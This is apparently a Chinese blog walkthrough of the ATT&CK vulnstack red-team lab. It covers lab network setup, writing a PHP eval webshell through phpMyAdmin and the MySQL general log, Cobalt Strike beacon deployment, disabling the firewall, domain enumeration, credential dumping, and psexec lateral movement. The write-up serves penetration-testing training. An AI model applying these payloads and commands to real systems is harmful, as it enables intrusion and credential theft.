ATT&CK实战系列(一)
环境下载

下载靶场环境,并导入虚拟机
分别是win2003、win7、winserver2008

配置网络
虚拟机——编辑——虚拟机网络编辑器——添加网络VMnet2——仅主机模式
分配的地址是192.168.52.0

配置好地址后,需要将win2003和winserver2008的网卡设置为VMnet2


win7的网络需要两张,一张为VMnet2,一张为NAT(我这用的是台式机搭建靶场,笔记本作为攻击机,所以用的桥接网络)

**总结:win7为web服务器双网卡,通外网。win2003和2008为域内服务器。**
win7:192.168.0.105、192.168.52.143
win2003:192.168.52.138
win2008:192.168.52.141
外网渗透
1、已知目标的外网是192.168.0.105
2、扫描ip的端口,获得80和3306端口。

3、访问80端口
获得phpstudy探针,获得绝对路径,探测出数据库弱口令


4、扫描192.168.0.105的目录
获得phpmyadmin目录

5、访问phpmyadmin
通过弱口令登录


6、通过日志写入webshell
SHOW VARIABLES LIKE '%general%' #查看日志

set global general_log = "ON" #开启日志记录


set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件


select "<?php eval($_POST['123'])?>"; #写入webshell

访问webshell

使用蚁剑连接木马

7、phpmyadmin的getshell方法
(1)Select into Outfile:这种方法涉及使用“SELECT … INTO OUTFILE”SQL语句将webshell写入服务器上的文件。攻击者必须知道webroot的绝对路径并具有对该目录的写权限。
show global variables like '%secure%' #root权限、绝对路径、secure_file_priv没具体值
如果secure_file_priv的值为null,表示限制mysqld不允许导入或导出
如果secure_file_priv的值为某个具体的目录路径(例如/tmp/),表示限制mysqld的导入或导出只能发生在该目录下
如果secure_file_priv没有具体值,表示不对mysqld的导入或导出做限制
在MySQL 5.5之前,secure_file_priv默认是空,这个情况下可以向任意绝对路径写文件。但在MySQL 5.5之后,secure_file_priv默认是NULL,这个情况下不可以写文件
(2)日志文件操作:这种方法涉及操作MySQL日志文件以将webshell写入服务器上的文件。攻击者必须具有对日志文件目录的写权限并知道webroot的绝对路径
SHOW VARIABLES LIKE '%general%' #查看日志
set global general_log = "ON" #开启日志记录
set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件
select "<?php eval($_POST['aaa']);?>"; #写入webshell
以上所有方法都需要满足某些条件,例如具有写权限并知道webroot的绝对路径
内网渗透
1、打开CS,生成监听器

2、创建木马程序,将目标上线cs

3、通过蚁剑将cs创建的木马上传

4、启动木马,上线cs

5、主机上线后
netsh advfirewall set allprofiles state off #关闭目标主机防火墙

ipconfig #查看信息,发现双网卡

net user #查看用户

提权


net view #查看计算机列表,并且会将其他计算机列入CS


net config Workstation #查看当前计算机名、域、登录域等

net view /domain #查看域

net localgruop administrators #查看域管

net tasklist #查看进程列表,是否存在杀软

net dclist #查看域控列表

提取凭证


提取明文密码

创建smb监听器

psexec

选择账号密码,监听器选择创建的smb,会话选择内网提权后的服务器

获得一台服务器的权限后,再次获得另一个内网服务器的权限并上线


新网站
phpmyadmin中看到有特殊的数据库,并且在蚁剑也看到不同的目录


获得新网站

公告信息获得敏感信息

打开后台弱口令登录


通过新建文件上传木马


在蚁剑获取到上传的目录

访问木马

连接木马

ATT&CK实战系列(一)的更多相关文章
- ATT&CK实战系列 红队实战(一)————环境搭建
首先感谢红日安全团队分享的靶机实战环境.红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习. 靶机下载地址:http://vulnstack.qiyuanxue ...
- ATT&CK实战系列——红队实战(一)
一.环境搭建 1.环境搭建测试 最近想要开始学习内网渗透,搜集了一些教程,准备先实验一个vulnstack靶机,熟悉一下内网渗透操作再学习基础知识. 靶场下载地址:http://vulnstack.q ...
- 【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)
一.环境搭建 1.1 靶场下载 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶机通用密码: 1qaz@WSX 1.2 环境配置 ...
- ATT&CK实战系列——红队实战(二)
一.环境搭建 靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ DC IP:10.10.10.10OS:Windows 2012应用:A ...
- ATT&CK 实战 - 红日安全 vulnstack (一) 环境部署
靶场描述: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博客三位一体学习.另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环.后续也会搭建真实APT实 ...
- ATT&CK 实战 - 红日安全 vulnstack (二) 环境部署(劝退水文)
靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/ 靶场简述 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习.视频教程.博 ...
- ATT&CK 实战 - 红日安全 vulnstack (一) 靶机渗透
关于部署:https://www.cnblogs.com/Cl0ud/p/13688649.html PS:好菜,后来发现内网主机还是PING不通VM1,索性三台主机全部配成NAT模式,按照WEB靶机 ...
- 内网横向渗透 之 ATT&CK系列一 之 拿下域控制器
信息收集 信息收集 域控制器的相关信息: 通过arp扫描发现域控制器的ip地址为:192.168.52.138,尝试使用msf的smb_login模块登录smb是否成功 1 search smb_lo ...
- 内网横向渗透 之 ATT&CK系列一 之 信息收集
前言 靶机下载地址:ATT&CK 拓扑图: 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环.虚拟机默认密码为hongrisec@2019. 环境搭 ...
- Spark入门实战系列--9.Spark图计算GraphX介绍及实例
[注]该系列文章以及使用到安装包/测试数据 可以在<倾情大奉送--Spark入门实战系列>获取 .GraphX介绍 1.1 GraphX应用背景 Spark GraphX是一个分布式图处理 ...
随机推荐
- web移动端触屏事件
1.移动端与pc端的区别 (1)移动端没有鼠标,自然也没有鼠标事件.所以onmousedown之类的事件监听在移动端时无效的. (2)移动端为了响应双击事件,onclick事件有300ms的延迟,接下 ...
- 使用 SemanticKernel 对接 Ollma
前面的 2 篇文章已经介绍了 ollama 的基本情况.我们也已经能在本地跟 LLM 进行聊天了.但是如何使用代码跟 LLM 进行交互呢?如果是 C# 选手那自然是使用 SK (SemanticKer ...
- [WPF UI] 为 AvalonDock 制作一套 Fluent UI 主题
AvalonDock 是我这些天在为自己项目做技术选型时发现的一个很好的开源项目,它是一个用于 WPF 的布局控件库,可以帮助我们实现类似 Visual Studio 的布局效果.因为它自带的一些样式 ...
- Flutter之GetX之GetConnect
Flutter之GetX之GetConnect GetConnect可以便捷的通过http或websockets进行前后台通信. 默认配置 能轻松的通过extend GetConnect就能使用GET ...
- APIView执行流程(源码分析)、Request对象源码分析
目录 一.APIView执行流程--源码分析(难,了解) 1.1 基于APIView+JsonResponse编写接口 1.2 基于APIView+Response 写接口 1.3 APIView的执 ...
- Qt/C++路径轨迹回放/回放每个点信号/回放结束信号/拿到移动的坐标点经纬度
一.前言说明 在使用百度地图的路书功能中,并没有提供移动的信号以及移动结束的信号,但是很多时候都期望拿到移动的哪里了以及移动结束的信号,以便做出对应的处理,比如结束后需要触发一些对应的操作.经过搜索发 ...
- Qt开发经验小技巧196-200
关于Qt延时的几种方法. void QUIHelperCore::sleep(int msec) { if (msec <= 0) { return; } #if 1 //非阻塞方式延时,现在很 ...
- Qt音视频开发39-人脸识别在线版
一.前言 关于人脸识别这块,前些年不要太火,哪怕是到了今天依然火的一塌糊涂,什么玩意都要跟人脸识别搭个边,这东西应该只是人工智能的一个很小的部分,人脸识别光从字面上理解就是识别出人脸区域,其实背后真正 ...
- OpenWrt作为旁路由配置Wireguard 实现内网穿透
0. 前言 因为最近一直在折腾软路由相关的系统及配置,也在家里整了一套k8s的环境,有一定需求需要在外面去连这套k8s的环境作为开发环境的补充,虽然可以通过外网端口暴露的方式访问,但是还是觉得不太方便 ...
- 以大模型攻大模型之💫Jailbreaking Black Box Large Language Models in 🎢Twenty Queries
"在高层次上,PAIR将两个黑盒LLMs--我们称之为攻击者和目标--相互对抗--"具体是如何对抗的?请各位看官仔细阅读~
